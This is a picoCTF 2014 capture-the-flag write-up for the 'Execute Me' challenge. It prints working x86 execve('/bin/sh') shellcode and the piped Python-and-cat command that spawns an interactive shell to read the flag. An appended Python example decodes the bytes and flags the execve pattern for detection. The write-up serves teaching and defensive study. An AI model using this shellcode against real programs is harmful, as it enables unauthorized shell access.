PicoCTF 2014 Write-ups

Execute Me - 80 (Binary Exploitation)

Writeup by Oksisane

Created: 2014-11-09 13:07:47

Last modified: 2014-11-17 20:58:07


This program will run whatever you send to it! Try to get the flag! The binary can be found at /home/execute/ on the shell server. The source can be found here.


You can get the flag in a number of ways, but the easiest would be to run a shell.



Use the program to execute some shellcode.


Let's start by running the program on the shell server. When we run it and type /bin/sh, the following appears:

[email protected]:~$ cd /home/execute/
[email protected]:/home/execute$ ./execute
Segmentation fault (core dumped)
[email protected]:/home/execute$

Huh, that's not good. Looking a little closer at the code we see this:

read(0, buf, 128);

So the program reads our input into a buffer and then executes it. However, it does not execute the buffer the way we might first expect, by passing it to the system() command to run it as a shell command line. Instead, it executes the bytes in the buffer directly as machine code. The hint tells us to run a shell, so we need shellcode. Shellcode is a short sequence of raw machine-code bytes, usually written out as hex values, that performs some function when executed, such as running cat or /bin/sh. Many websites provide ready-made shellcode, such as shell-storm. For now, let's use this shellcode, which calls execve("/bin/sh"):

[email protected]:/home/execute$ ./execute
Segmentation fault (core dumped)
[email protected]:/home/execute$

Huh, that still didn't work. When we type the shellcode at the prompt, the program receives the escape sequence \x31 as 4 separate ASCII characters (backslash, x, 3, 1) instead of the single byte 0x31 (49 in decimal). Our next task is therefore to pipe the raw byte values into the program instead of typing them in. We can do this with Python:

[email protected]:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'") | ./execute
[email protected]:/home/execute$

This uses Python to print our raw bytes into the program's standard input. Note the use of double quotes (") to enclose the Python code and single quotes (') to enclose the string passed to print. This time we get no error, but still no shell! The shell does start with this shellcode, but its standard input is the pipe, which reaches end-of-file as soon as Python finishes printing, so the shell exits before we can type anything into it. The final step is to append a cat to the end of our Python command: cat keeps the pipe open and forwards whatever we type to the shell.

[email protected]:/home/execute$ (python -c "print '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | ./execute
cat flag.txt

Our shell runs successfully and we get our flag!
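To make the two points above concrete, the escape-vs-byte difference and what the bytes actually are, here is an added Python 3 example (not part of the write-up or the challenge source). It decodes the \x escapes the way the piped print command does, and then applies a toy triage heuristic of the kind a defender might run over captured input: it looks for the 32-bit Linux execve pattern (mov al, 0x0b ; int 0x80) and recovers the string constants the shellcode pushes onto the stack. The heuristic is deliberately simple and only recognises this push-immediate style of shellcode.

```python
"""Decode hex-escaped shellcode text and triage it for the x86 execve pattern.
Constructed example; the byte string is the one used in the write-up."""
import re

# The text typed inside the print command in the write-up (21 escapes).
ESCAPED = (r"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
           r"\x89\xe3\xb0\x0b\xcd\x80")

SYS_EXECVE = 0x0B   # 32-bit Linux syscall number for execve


def typed_length(escaped_text: str) -> int:
    """Characters the program receives if the escapes are typed literally
    at the prompt: 4 per escape (backslash, x, and two hex digits)."""
    return len(escaped_text)


def decoded_bytes(escaped_text: str) -> bytes:
    """What `print '\\x31...'` actually emits: one raw byte per escape."""
    return bytes(int(h, 16)
                 for h in re.findall(r"\\x([0-9a-fA-F]{2})", escaped_text))


SHELLCODE = decoded_bytes(ESCAPED)


def pushed_strings(code: bytes) -> bytes:
    """Collect the operands of every `push imm32` (opcode 0x68).  The last
    push lands lowest on the stack, so reversing the order gives the string
    as the kernel will read it."""
    imms = [m.group(1) for m in re.finditer(rb"\x68(.{4})", code, re.S)]
    return b"".join(reversed(imms))


def looks_like_execve(code: bytes) -> bool:
    """True when `mov al, 0x0b` is followed by `int 0x80` and a /bin path
    was pushed onto the stack: the classic execve("/bin/sh") shape."""
    syscall = b"\xb0" + bytes([SYS_EXECVE]) + b"\xcd\x80"
    return syscall in code and b"/bin" in pushed_strings(code)


if __name__ == "__main__":
    print("typed:", typed_length(ESCAPED), "chars; piped:", len(SHELLCODE), "bytes")
    print("stack string:", pushed_strings(SHELLCODE))
    print("execve shellcode?", looks_like_execve(SHELLCODE))
```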